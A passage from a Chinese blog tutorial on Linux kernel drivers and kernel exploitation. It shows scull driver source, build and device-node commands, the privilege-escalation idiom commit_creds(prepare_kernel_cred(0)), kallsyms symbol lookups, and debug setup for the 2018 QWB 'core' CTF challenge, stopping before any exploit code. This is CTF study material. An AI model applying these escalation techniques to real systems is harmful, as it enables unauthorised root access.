Data management: read and write.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">ssize_t</span> scull_read(struct file *filp, <span class="keyword">char</span> __user *buf, <span class="keyword">size_t</span> count,</span><br><span class="line">                <span class="keyword">loff_t</span> *f_pos)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">scull_dev</span> *<span class="title">dev</span> = <span class="title">filp</span>-&gt;<span class="title">private_data</span>;</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">scull_qset</span> *<span class="title">dptr</span>;</span> <span class="comment">/* the first listitem */</span></span><br><span class="line">    <span class="keyword">int</span> quantum = dev-&gt;quantum, qset = dev-&gt;qset;</span><br><span class="line">    <span class="keyword">int</span> itemsize = quantum * qset; <span class="comment">/* how many bytes in the listitem */</span></span><br><span class="line">    <span class="keyword">int</span> item, s_pos, q_pos, rest;</span><br><span class="line">    <span class="keyword">ssize_t</span> retval = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (mutex_lock_interruptible(&amp;dev-&gt;mutex))</span><br><span class="line">        <span class="keyword">return</span> -ERESTARTSYS;</span><br><span class="line">    <span class="keyword">if</span> (*f_pos &gt;= dev-&gt;<span class="built_in">size</span>)</span><br><span class="line">        <span class="keyword">goto</span> out;</span><br><span class="line">    <span class="keyword">if</span> (*f_pos + count &gt; dev-&gt;<span class="built_in">size</span>)</span><br><span class="line">        count = dev-&gt;<span class="built_in">size</span> - *f_pos;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* Find listitem, qset index, and offset in the quantum */</span></span><br><span class="line">    item = (<span class="keyword">long</span>)*f_pos / itemsize;</span><br><span class="line">    rest = (<span class="keyword">long</span>)*f_pos % itemsize;</span><br><span class="line">    s_pos = rest / quantum; q_pos = rest % quantum;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* follow the list up to the right position (defined elsewhere) */</span></span><br><span class="line">    dptr = scull_follow(dev, item);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (dptr == <span class="literal">NULL</span> || !dptr-&gt;data || ! dptr-&gt;data[s_pos])</span><br><span class="line">        <span class="keyword">goto</span> out; <span class="comment">/* don't fill holes */</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">/* read only up to the end of this quantum */</span></span><br><span class="line">    <span class="keyword">if</span> (count &gt; quantum - q_pos)</span><br><span class="line">        count = quantum - q_pos;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (raw_copy_to_user(buf, dptr-&gt;data[s_pos] + q_pos, count)) &#123;</span><br><span class="line">        retval = -EFAULT;</span><br><span class="line">        <span class="keyword">goto</span> out;</span><br><span class="line">    &#125;</span><br><span class="line">    *f_pos += count;</span><br><span class="line">    retval = count;</span><br><span class="line"></span><br><span class="line">  out:</span><br><span class="line">    mutex_unlock(&amp;dev-&gt;mutex);</span><br><span class="line">    <span class="keyword">return</span> retval;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">ssize_t</span> scull_write(struct file *filp, <span class="keyword">const</span> <span class="keyword">char</span> __user *buf, <span class="keyword">size_t</span> count,</span><br><span class="line">                <span class="keyword">loff_t</span> *f_pos)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">scull_dev</span> *<span class="title">dev</span> = <span class="title">filp</span>-&gt;<span class="title">private_data</span>;</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">scull_qset</span> *<span class="title">dptr</span>;</span></span><br><span class="line">    <span class="keyword">int</span> quantum = dev-&gt;quantum, qset = dev-&gt;qset;</span><br><span class="line">    <span class="keyword">int</span> itemsize = quantum * qset;</span><br><span class="line">    <span class="keyword">int</span> item, s_pos, q_pos, rest;</span><br><span class="line">    <span class="keyword">ssize_t</span> retval = -ENOMEM; <span class="comment">/* Value used in "goto out" statements. */</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (mutex_lock_interruptible(&amp;dev-&gt;mutex))</span><br><span class="line">        <span class="keyword">return</span> -ERESTARTSYS;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* Find the list item, qset index, and offset in the quantum. */</span></span><br><span class="line">    item = (<span class="keyword">long</span>)*f_pos / itemsize;</span><br><span class="line">    rest = (<span class="keyword">long</span>)*f_pos % itemsize;</span><br><span class="line">    s_pos = rest / quantum;</span><br><span class="line">    q_pos = rest % quantum;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* Follow the list up to the right position. */</span></span><br><span class="line">    dptr = scull_follow(dev, item);</span><br><span class="line">    <span class="keyword">if</span> (dptr == <span class="literal">NULL</span>)</span><br><span class="line">        <span class="keyword">goto</span> out;</span><br><span class="line">    <span class="keyword">if</span> (!dptr-&gt;data) &#123;</span><br><span class="line">        dptr-&gt;data = kmalloc(qset * <span class="keyword">sizeof</span>(<span class="keyword">char</span> *), GFP_KERNEL);</span><br><span class="line">        <span class="keyword">if</span> (!dptr-&gt;data)</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">        <span class="built_in">memset</span>(dptr-&gt;data, <span class="number">0</span>, qset * <span class="keyword">sizeof</span>(<span class="keyword">char</span> *));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (!dptr-&gt;data[s_pos]) &#123;</span><br><span class="line">        dptr-&gt;data[s_pos] = kmalloc(quantum, GFP_KERNEL);</span><br><span class="line">        <span class="keyword">if</span> (!dptr-&gt;data[s_pos])</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">/* Write only up to the end of this quantum. */</span></span><br><span class="line">    <span class="keyword">if</span> (count &gt; quantum - q_pos)</span><br><span class="line">        count = quantum - q_pos;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (raw_copy_from_user(dptr-&gt;data[s_pos]+q_pos, buf, count)) &#123;</span><br><span class="line">        retval = -EFAULT;</span><br><span class="line">        <span class="keyword">goto</span> out;</span><br><span class="line">    &#125;</span><br><span class="line">    *f_pos += count;</span><br><span class="line">    retval = count;</span><br><span class="line"></span><br><span class="line">        <span class="comment">/* Update the size. */</span></span><br><span class="line">    <span class="keyword">if</span> (dev-&gt;<span class="built_in">size</span> &lt; *f_pos)</span><br><span class="line">        dev-&gt;<span class="built_in">size</span> = *f_pos;</span><br><span class="line"></span><br><span class="line">  out:</span><br><span class="line">    mutex_unlock(&amp;dev-&gt;mutex);</span><br><span class="line">    <span class="keyword">return</span> retval;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Beginning of the scull device implementation. */</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Empty out the scull device; must be called with the device</span></span><br><span class="line"><span class="comment"> * mutex held.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">scull_trim</span><span class="params">(struct scull_dev *dev)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">scull_qset</span> *<span class="title">next</span>, *<span class="title">dptr</span>;</span></span><br><span class="line">    <span class="keyword">int</span> qset = dev-&gt;qset;   <span class="comment">/* "dev" is not-null */</span></span><br><span class="line">    <span class="keyword">int</span> i;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (dptr = dev-&gt;data; dptr; dptr = next) &#123; <span class="comment">/* all the list items */</span></span><br><span class="line">        <span class="keyword">if</span> (dptr-&gt;data) &#123;</span><br><span class="line">            <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; qset; i++)</span><br><span class="line">                kfree(dptr-&gt;data[i]);</span><br><span class="line">            kfree(dptr-&gt;data);</span><br><span class="line">            dptr-&gt;data = <span class="literal">NULL</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        next = dptr-&gt;next;</span><br><span class="line">        kfree(dptr);</span><br><span class="line">    &#125;</span><br><span class="line">    dev-&gt;<span class="built_in">size</span> = <span class="number">0</span>;</span><br><span class="line">    dev-&gt;quantum = scull_quantum;</span><br><span class="line">    dev-&gt;qset = scull_qset;</span><br><span class="line">    dev-&gt;data = <span class="literal">NULL</span>;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">scull_release</span><span class="params">(struct inode *inode, struct file *filp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    printk(KERN_DEBUG <span class="string">"process %i (%s) success release minor(%u) file\n"</span>, current-&gt;pid, current-&gt;comm, iminor(inode));</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Open and close</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">scull_open</span><span class="params">(struct inode *inode, struct file *filp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">scull_dev</span> *<span class="title">dev</span>;</span> <span class="comment">/* device information */</span></span><br><span class="line"></span><br><span class="line">    dev = container_of(inode-&gt;i_cdev, struct scull_dev, cdev);</span><br><span class="line">    filp-&gt;private_data = dev; <span class="comment">/* for other methods */</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">/* If the device was opened write-only, trim it to a length of 0. */</span></span><br><span class="line">    <span class="keyword">if</span> ( (filp-&gt;f_flags &amp; O_ACCMODE) == O_WRONLY) &#123;</span><br><span class="line">        <span class="keyword">if</span> (mutex_lock_interruptible(&amp;dev-&gt;mutex))</span><br><span class="line">            <span class="keyword">return</span> -ERESTARTSYS;</span><br><span class="line">        scull_trim(dev); <span class="comment">/* Ignore errors. */</span></span><br><span class="line">        mutex_unlock(&amp;dev-&gt;mutex);</span><br><span class="line">    &#125;</span><br><span class="line">    printk(KERN_DEBUG <span class="string">"process %i (%s) success open minor(%u) file\n"</span>, current-&gt;pid, current-&gt;comm, iminor(inode));</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * The "extended" operations -- only seek.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">loff_t</span> scull_llseek(struct file *filp, <span class="keyword">loff_t</span> off, <span class="keyword">int</span> whence)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">scull_dev</span> *<span class="title">dev</span> = <span class="title">filp</span>-&gt;<span class="title">private_data</span>;</span></span><br><span class="line">    <span class="keyword">loff_t</span> newpos;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">switch</span>(whence) &#123;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">0</span>: <span class="comment">/* SEEK_SET */</span></span><br><span class="line">        newpos = off;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line">      <span class="keyword">case</span> <span class="number">1</span>: <span class="comment">/* SEEK_CUR */</span></span><br><span class="line">        newpos = filp-&gt;f_pos + off;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line">      <span class="keyword">case</span> <span class="number">2</span>: <span class="comment">/* SEEK_END */</span></span><br><span class="line">        newpos = dev-&gt;<span class="built_in">size</span> + off;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line">      <span class="keyword">default</span>: <span class="comment">/* can't happen */</span></span><br><span class="line">        <span class="keyword">return</span> -EINVAL;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (newpos &lt; <span class="number">0</span>)</span><br><span class="line">        <span class="keyword">return</span> -EINVAL;</span><br><span class="line">    filp-&gt;f_pos = newpos;</span><br><span class="line">    <span class="keyword">return</span> newpos;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">file_operations</span> <span class="title">scull_fops</span> = &#123;</span></span><br><span class="line">    .owner =    THIS_MODULE,</span><br><span class="line">    .llseek =   scull_llseek,</span><br><span class="line">    .<span class="built_in">read</span> =     scull_read,</span><br><span class="line">    .<span class="built_in">write</span> =    scull_write,</span><br><span class="line">    <span class="comment">// .unlocked_ioctl = scull_ioctl,</span></span><br><span class="line">    .<span class="built_in">open</span> =     scull_open,</span><br><span class="line">    .<span class="built_in">release</span> =  scull_release,</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Set up the char_dev structure for this device.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">void</span> <span class="title">scull_setup_cdev</span><span class="params">(struct scull_dev *dev, <span class="keyword">int</span> index)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">int</span> err, devno = MKDEV(scull_major, scull_minor + index);</span><br><span class="line"></span><br><span class="line">    cdev_init(&amp;dev-&gt;cdev, &amp;scull_fops);</span><br><span class="line">    dev-&gt;cdev.owner = THIS_MODULE;</span><br><span class="line">    dev-&gt;cdev.ops = &amp;scull_fops;</span><br><span class="line">    err = cdev_add (&amp;dev-&gt;cdev, devno, <span class="number">1</span>);</span><br><span class="line">    <span class="comment">/* Fail gracefully if need be. */</span></span><br><span class="line">    <span class="keyword">if</span> (err)</span><br><span class="line">        printk(KERN_NOTICE <span class="string">"Error %d adding scull%d"</span>, err, index);</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        printk(KERN_INFO <span class="string">"scull: %d add success\n"</span>, index);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">scull_cleanup_module</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">int</span> i;</span><br><span class="line">    <span class="keyword">dev_t</span> devno = MKDEV(scull_major, scull_minor);</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* Get rid of our char dev entries. */</span></span><br><span class="line">    <span class="keyword">if</span> (scull_devices) &#123;</span><br><span class="line">        <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; scull_nr_devs; i++) &#123;</span><br><span class="line">            scull_trim(scull_devices + i);</span><br><span class="line">            cdev_del(&amp;scull_devices[i].cdev);</span><br><span class="line">        &#125;</span><br><span class="line">        kfree(scull_devices);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* cleanup_module is never called if registering failed. */</span></span><br><span class="line">    unregister_chrdev_region(devno, scull_nr_devs);</span><br><span class="line">    printk(KERN_INFO <span class="string">"scull: cleanup success\n"</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">scull_init_module</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">int</span> result, i;</span><br><span class="line">    <span class="keyword">dev_t</span> dev = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">     * Get a range of minor numbers to work with, asking for a dynamic major</span></span><br><span class="line"><span class="comment">     * unless directed otherwise at load time.</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">if</span> (scull_major) &#123;</span><br><span class="line">        dev = MKDEV(scull_major, scull_minor);</span><br><span class="line">        result = register_chrdev_region(dev, scull_nr_devs, <span class="string">"scull"</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        result = alloc_chrdev_region(&amp;dev, scull_minor, scull_nr_devs, <span class="string">"scull"</span>);</span><br><span class="line">        scull_major = MAJOR(dev);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (result &lt; <span class="number">0</span>) &#123;</span><br><span class="line">        printk(KERN_WARNING <span class="string">"scull: can't get major %d\n"</span>, scull_major);</span><br><span class="line">        <span class="keyword">return</span> result;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        printk(KERN_INFO <span class="string">"scull: get major %d success\n"</span>, scull_major);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">        <span class="comment">/*</span></span><br><span class="line"><span class="comment">     * Allocate the devices. This must be dynamic as the device number can</span></span><br><span class="line"><span class="comment">     * be specified at load time.</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    scull_devices = kmalloc(scull_nr_devs * <span class="keyword">sizeof</span>(struct scull_dev), GFP_KERNEL);</span><br><span class="line">    <span class="keyword">if</span> (!scull_devices) &#123;</span><br><span class="line">        result = -ENOMEM;</span><br><span class="line">        <span class="keyword">goto</span> fail;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">memset</span>(scull_devices, <span class="number">0</span>, scull_nr_devs * <span class="keyword">sizeof</span>(struct scull_dev));</span><br><span class="line"></span><br><span class="line">        <span class="comment">/* Initialize each device. */</span></span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; scull_nr_devs; i++) &#123;</span><br><span class="line">        scull_devices[i].quantum = scull_quantum;</span><br><span class="line">        scull_devices[i].qset = scull_qset;</span><br><span class="line">        mutex_init(&amp;scull_devices[i].mutex);</span><br><span class="line">        scull_setup_cdev(&amp;scull_devices[i], i);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>; <span class="comment">/* succeed */</span></span><br><span class="line"></span><br><span class="line">  fail:</span><br><span class="line">    scull_cleanup_module();</span><br><span class="line">    <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">module_init(scull_init_module);</span><br><span class="line">module_exit(scull_cleanup_module);</span><br></pre></td></tr></table></figure>

<p>makefile：</p>
<figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">ifneq</span> (<span class="variable">$(KERNELRELEASE)</span>,)</span><br><span class="line"></span><br><span class="line">	obj-m := file_operations.o</span><br><span class="line"></span><br><span class="line"><span class="keyword">else</span></span><br><span class="line"></span><br><span class="line">	KERN_DIR ?= /usr/src/linux-headers-<span class="variable">$(<span class="built_in">shell</span> uname -r)</span>/</span><br><span class="line">	PWD := <span class="variable">$(<span class="built_in">shell</span> pwd)</span></span><br><span class="line"></span><br><span class="line"><span class="section">default:</span></span><br><span class="line"></span><br><span class="line">	<span class="variable">$(MAKE)</span> -C <span class="variable">$(KERN_DIR)</span> M=<span class="variable">$(PWD)</span> modules</span><br><span class="line"></span><br><span class="line"><span class="keyword">endif</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="section">clean:</span></span><br><span class="line">	rm -rf *.o *~ core .depend .*.cmd *.ko *.mod.c .tmp_versions</span><br></pre></td></tr></table></figure>

<h3 id="IDA界面如下-1"><a href="#IDA界面如下-1" class="headerlink" title="IDA界面如下"></a>IDA界面如下</h3><p><img src="/2020/03/23/kernel%E5%85%A5%E9%97%A8/1584963141639.png" alt="1584963141639"></p>
<p>可以看到这边是一系列的对应的操作函数</p>
<hr>
<p>驱动提供的接口是<code>/dev/xxx</code>，在Linux下<code>Everything is File</code>，所以对驱动设备的操作其实就是对文件的操作，所以一个驱动就是用来<strong>定义</strong>，<strong>打开/读/写/……一个<code>/dev/xxx</code>将会发生啥</strong>，驱动提供的API（fops中指定的）也就是<strong>一系列的文件操作</strong></p>
<p><code>struct file_operations scull_fops</code>结构体中实现了的函数就会静态初始化上函数地址，而未实现的函数，值为NULL</p>
<p>结构体中实现的几个call，冒号右侧的函数名是由开发者自己起的，在驱动程序载入内核后，其他用户程序程序就可以借助<strong>文件方式</strong>像进行系统调用一样调用这些函数实现所需功能。</p>
<p>这里是一些已知的常见对应操作：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Events		User functions		Kernel functions</span><br><span class="line">Load		insmod				module_init()</span><br><span class="line">Open		fopen				file_operations: open</span><br><span class="line">Close		fread				file_operations: read</span><br><span class="line">Write		fwrite				file_operations: write</span><br><span class="line">Close		fclose				file_operations: release</span><br></pre></td></tr></table></figure>

<p><a href="https://paper.seebug.org/779/#1-" target="_blank" rel="noopener">这里</a>还有一些知识点，比如驱动分类，主次编号，什么的，我写的这些主要也是参考了这篇文章</p>
<hr>
<p>之后insmod，此时虽然驱动已经加载成功了（dmesg可以看到驱动主编号是246，分别用四个次编号标记了4个设备，4个是怎么来的看上面代码就知道了）</p>
<p><img src="/2020/03/23/kernel%E5%85%A5%E9%97%A8/1584964191239.png" alt="1584964191239"></p>
<p>但是此时并不会在/dev目录下创建设备文件，需要我们手动使用<code>mknod</code>进行设备链接</p>
<p><img src="/2020/03/23/kernel%E5%85%A5%E9%97%A8/1584964631604.png" alt="1584964631604"></p>
<p>此时还可以指定设备类型，然后删除就直接使用rm就好了</p>
<p>这里记一下命令：<br>dmesg可以查看syslog<br>cat /proc/devices 中查看设备的类型（左边是主设备号，右边的是设备名）<br>mknod 设备名 设备类型(字符：c,块：b) 主设备号 从设备号</p>
<p>rmmod之后dmesg还可以看到一条<code>scull: cleanup success</code></p>
<h1 id="kernel-pwn基础知识"><a href="#kernel-pwn基础知识" class="headerlink" title="kernel pwn基础知识"></a>kernel pwn基础知识</h1><p>在<a href="https://www.anquanke.com/post/id/172216" target="_blank" rel="noopener">这篇文章</a>，中有这么一句话</p>
<blockquote>
<p>如果驱动在init中执行了proc_create(“core”, 0x1B6LL, 0LL, &amp;core_fops)，文件名是“core”，而且在回调中实现了ioctl，那么其他用户程序就可以先fopen这个core获取文件指针fd，然后执行ioctl(fd,&lt;参数&gt;,&lt;参数&gt;)来进行具体操作，其他的fop中的回调接口函数也类似。</p>
</blockquote>
<p>然后我就去看了ioctl是什么：</p>
<hr>
<blockquote>
<p>ioctl(input/output control)是一个专用于设备输入输出操作的系统调用,该调用传入一个跟设备有关的请求码，系统调用的功能完全取决于请求码</p>
</blockquote>
<blockquote>
<p>ioctl是设备驱动程序中对设备的I/O通道进行管理的函数。所谓对I/O通道进行管理，就是对设备的一些特性进行控制，例如串口的传输波特率、马达的转速等等。它的调用个数如下：</p>
</blockquote>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">ioctl</span><span class="params">(<span class="keyword">int</span> fd, ind cmd, …)</span></span>;</span><br></pre></td></tr></table></figure>

<blockquote>
<p>其中fd是用户程序打开设备时使用open函数返回的文件标示符，cmd是用户程序对设备的控制命令，至于后面的省略号，那是一些补充参数，一般最多一个，这个参数的有无和cmd的意义相关。</p>
</blockquote>
<blockquote>
<p>ioctl函数是文件结构中的一个属性分量，就是说如果你的驱动程序提供了对ioctl的支持，用户就可以在用户程序中使用ioctl函数来控制设备的I/O通道。</p>
</blockquote>
<hr>
<p>差不多就是我们与驱动设备交互的一个函数吧，一般前两个参数是fd还有控制码，然后还有一句话</p>
<blockquote>
<p>一个进程的在用户态和内核态是对应了完全不搭边儿的两个栈的，用户栈和内核栈既然相互隔离，在系统调用或者调用驱动、内核模块函数时就不能通过栈传参了，而要通过寄存器，像拷贝这样的操作也要借助具体的函数：copy_to_user/copy_from_user</p>
</blockquote>
<p>就是说内核栈和用户栈是相互隔离的，然后通过寄存器传参</p>
<p>然后<strong>进入kernel态</strong>一般有如下情况：</p>
<ol>
<li><p>系统调用</p>
</li>
<li><p>产生异常</p>
</li>
<li><p>外设产生中断</p>
<p>等等</p>
</li>
</ol>
<p>至于提权的话就是这些了：由于这些内核模块运行时的权限是root权限，因此我们将有机会借此拿到root权限的shell，流程上就是C程序exp调用内核模块利用其漏洞提权，只是提权后要“着陆”回用户态拿shell。提权代码是<code>commit_creds(prepare_kernel_cred(0))</code></p>
<h2 id="进入kernel态进行的操作"><a href="#进入kernel态进行的操作" class="headerlink" title="进入kernel态进行的操作"></a>进入kernel态进行的操作</h2><p>保存用户态的各个寄存器，以及执行到代码的位置</p>
<h2 id="从kernel态返回用户态进行的操作"><a href="#从kernel态返回用户态进行的操作" class="headerlink" title="从kernel态返回用户态进行的操作"></a>从kernel态返回用户态进行的操作</h2><p>执行swapgs 和 iret 指令</p>
<h2 id="一般的攻击思路"><a href="#一般的攻击思路" class="headerlink" title="一般的攻击思路"></a>一般的攻击思路</h2><p><img src="/2020/03/23/kernel%E5%85%A5%E9%97%A8/1584965699729.png" alt="1584965699729"></p>
<hr>
<p>记一下命令：</p>
<p>查看所开保护cat /proc/cpuinfo<br>查看内核堆块 cat /proc/slabinfo<br>查看prepare_kernel_cred和commit_creds地址<br>    grep prepare_kernel_cred  /proc/kallsyms<br>    grep commit_creds  /proc/kallsyms </p>
<hr>
<h1 id="实操linux-kernel-ROP"><a href="#实操linux-kernel-ROP" class="headerlink" title="实操linux kernel ROP"></a>实操linux kernel ROP</h1><h2 id="强网杯2018-core"><a href="#强网杯2018-core" class="headerlink" title="强网杯2018-core"></a>强网杯2018-core</h2><p>下载下来压缩文件之后看到有这几个文件：</p>
<p><img src="/2020/03/23/kernel%E5%85%A5%E9%97%A8/1584966164347.png" alt="1584966164347"></p>
<p>其中对应的文件意思如下（来自星盟公开课的截图）：</p>
<p><img src="/2020/03/23/kernel%E5%85%A5%E9%97%A8/1584966068272.png" alt="1584966068272"></p>
<p>其中bzImage是打包的内核代码，可以用来寻找<strong>gadget</strong></p>
<p>这里写一下师傅们的注意事项：</p>
<blockquote>
<p>注意，vmlinux是未经压缩的，然而在core.cpio里面也有一个vmlinux，里面那个是起系统后真正的vmlinux，按理说这俩应该是一样的，单独拿出来是为了你方便分析，但是笔者亲测的时候发现这俩竟然不一样，可能是下载的时候弄错了？如果读者也遇到相同情况，不要用外面那个，一定要用core.cpio里面那个</p>
</blockquote>
<p>start.sh中有以下内容</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">qemu-system-x86_64 \</span><br><span class="line">-m 64M \</span><br><span class="line">-kernel ./bzImage \</span><br><span class="line">-initrd  ./core.cpio \</span><br><span class="line">-append <span class="string">"root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr"</span> \ <span class="comment">#这里开启了kaslr保护</span></span><br><span class="line">-s  \</span><br><span class="line">-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \</span><br><span class="line">-nographic  \</span><br></pre></td></tr></table></figure>

<p>我们可以自己再做一份rootstart.sh还有一个root.cpio，主要是用来调试</p>
<p>其中在sh文件最后加上gdb调试的选项：<code>-gdb tcp::1234</code><br>还有比如关掉kaslr</p>
<p>新制作的root.cpio中则需要修改以下几点：</p>
<ol>
<li>cpio包中的init文件，里面有一行poweroff，是到时间自动关机的命令，可以取消掉</li>
<li>同样是init文件，setsid /bin/cttyhack setuidgid 1000 /bin/sh改成0000，这样就可以以root身份启动了</li>
</ol>
<p>ps:这里就是整个系统的配置，如果发现有什么配置有问题的话说不定就非预期解了….然后系统初始化操作没有写在这里的话看看<code>/etc/init.d/rcS</code>，有时候初始化配置会写在这里</p>
<p>新制作的<code>rootstart.sh</code>就是这样：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">qemu-system-x86_64 \</span><br><span class="line">-m 64M \</span><br><span class="line">-kernel ./bzImage \</span><br><span class="line">-initrd  ./root.cpio \ <span class="comment">#用新的root.cpio启动</span></span><br><span class="line">-append <span class="string">"root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet nokaslr"</span> \ <span class="comment">#nokslr</span></span><br><span class="line">-s  \</span><br><span class="line">-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \</span><br><span class="line">-nographic  \</span><br><span class="line">-gdb tcp::1234 <span class="comment"># gdb 调试端口</span></span><br></pre></td></tr></table></figure>

<h3 id="启动踩坑"><a href="#启动踩坑" class="headerlink" title="启动踩坑"></a>启动踩坑</h3><p>然后启动….</p>
<p>但是启动的时候我疯狂踩坑，被坑了很久很久</p>
<p>那个-s就是代表了<code>-gdb tcp::1234</code>所以并不需要这一行….</p>
<p>然后qemu第一个报错是：<code>Initramfs unpacking failed: incorrect cpio method used: use -H newc option</code>，因为我在之前尝试用</p>
